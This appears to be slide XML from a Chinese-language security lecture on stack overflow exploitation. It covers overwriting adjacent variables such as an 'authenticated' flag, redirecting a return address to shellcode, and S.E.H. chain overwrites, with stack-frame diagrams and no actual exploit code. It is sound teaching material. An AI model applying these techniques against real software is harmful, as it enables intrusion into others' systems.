            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>为前三</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6149" name="图片 4" descr="f10d99cea78f473da3b3474875fb78b4.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="900113" y="2060575"/>
            <a:ext cx="7200900" cy="4657725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>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栈溢出的利用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="501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栈溢出利用分类</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>修改邻接变量</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>修改函数返回地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>S.E.H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>结构覆盖</a:t>
            </a:r>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修改邻接变量</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原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>由于函数的局部变量是依次存储在栈帧上的，因此如果这些局部变量中有数组之类的缓冲区，且程序中存在数组越界缺陷，则数组越界后就有可能破坏栈中相邻变量的值，甚至破坏栈帧中所保存的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>EBP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>、返回地址等重要数据</a:t>
            </a:r>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栈溢出缺陷的程序例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5222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cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="555625" y="2230438"/>
            <a:ext cx="6888163" cy="4351337"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3756025" y="895350"/>
            <a:ext cx="4897438" cy="2560638"/>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9" presetClass="emph" presetSubtype="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr rctx="PPT">
                                        <p:cTn id="14" dur="indefinite"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.opacity</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="0.5"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="image" prLst="opacity: 0.5">
                                      <p:cBhvr rctx="IE">
                                        <p:cTn id="15"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栈帧状态</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5325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a:t>执行到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>verify_password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>时，栈帧状态图</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2843213" y="2204864"/>
            <a:ext cx="3097212"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char buff[0-3] (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ASCII:qqqq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2843213" y="2781127"/>
            <a:ext cx="3097212"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char buff[4-7] (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ASCII:qqq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>\0)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2843808" y="1628601"/>
            <a:ext cx="3097212"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t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> authenticated (0x00000001)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2843213" y="3357563"/>
            <a:ext cx="3097212"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前栈帧的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>EBP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2843213" y="3933825"/>
            <a:ext cx="3097212"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返回地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2843213" y="4508500"/>
            <a:ext cx="3097212"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参数：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2843213" y="5084763"/>
            <a:ext cx="3097212"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53259" name="文本框 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1403350" y="1731963"/>
            <a:ext cx="647700" cy="369887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ESP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="直接箭头连接符 12"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2124075" y="1916113"/>
            <a:ext cx="71913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261" name="文本框 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1403350" y="3500438"/>
            <a:ext cx="647700" cy="369887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EBP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="直接箭头连接符 15"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2124075" y="3686175"/>
            <a:ext cx="71913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直接箭头连接符 17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6300788" y="1916113"/>
            <a:ext cx="71437" cy="35290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264" name="文本框 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6005513" y="1519238"/>
            <a:ext cx="869950" cy="369887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>低地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53265" name="文本框 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6084888" y="5476875"/>
            <a:ext cx="869950" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>高地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53266" name="文本框 20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6492875" y="2101850"/>
            <a:ext cx="461963" cy="2982913"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>栈生长方向</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="圆角矩形标注 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6156325" y="3213100"/>
            <a:ext cx="2190750" cy="1008063"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -60012"/>
              <a:gd name="adj2" fmla="val -862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t>buff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>数组越界会覆盖</a:t>
            </a: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修改函数返回地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="542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原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>函数返回地址被修改，在当前函数执行完毕准备返回原调用函数时，程序流程将被改变</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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示例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5529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6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2843213" y="2133600"/>
            <a:ext cx="367347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Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（可执行的机器码）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2843213" y="2709863"/>
            <a:ext cx="367347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8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2843213" y="3286125"/>
            <a:ext cx="3673475" cy="646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前栈帧的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>EBP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（覆盖）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2843213" y="3860800"/>
            <a:ext cx="367347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返回地址（覆盖为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2843213" y="4437063"/>
            <a:ext cx="367347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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="直接箭头连接符 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6596063" y="1916113"/>
            <a:ext cx="71437" cy="352901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5306" name="文本框 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6300788" y="1519238"/>
            <a:ext cx="869950" cy="369887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>低地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55307" name="文本框 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6380163" y="5476875"/>
            <a:ext cx="869950" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>高地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55308" name="文本框 20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6583363" y="3033713"/>
            <a:ext cx="461962" cy="1258887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>栈生长方向</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="曲线连接符 15"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="1"/>
            <a:endCxn id="6" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2843213" y="2457450"/>
            <a:ext cx="12700" cy="1727200"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5115102"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>
            <a:prstDash val="lg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55310" name="文本框 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1331913" y="2852738"/>
            <a:ext cx="923925" cy="646112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>控制流</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跳转</a:t>
            </a:r>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问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="563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由于动态链接库的装入和卸载等原因，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进程的函数栈帧可能发生“移位”，导致跳转异常</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>处于栈中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>开始位置的高位通常为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0x00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，使得构造的溢出字符串中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>0x00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>之后的数据可能在进行字符串操作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>时被截断</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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S.E.H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>结构覆盖</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="593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Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>异常处理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>为了保证在出现除零、非法内存访问等错误时，系统也能正常运行而不至于崩溃或宕机，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>会对运行的程序提供一次补救机会来处理错误</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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S.E.H</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="604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S.E.H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>结构体</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>位于系统栈中，包含两个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DWORD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>指针</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>当栈中存在多个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>S.E.H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>时，它们之间通过链表指针在栈内由栈顶向栈底串成单向链表</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
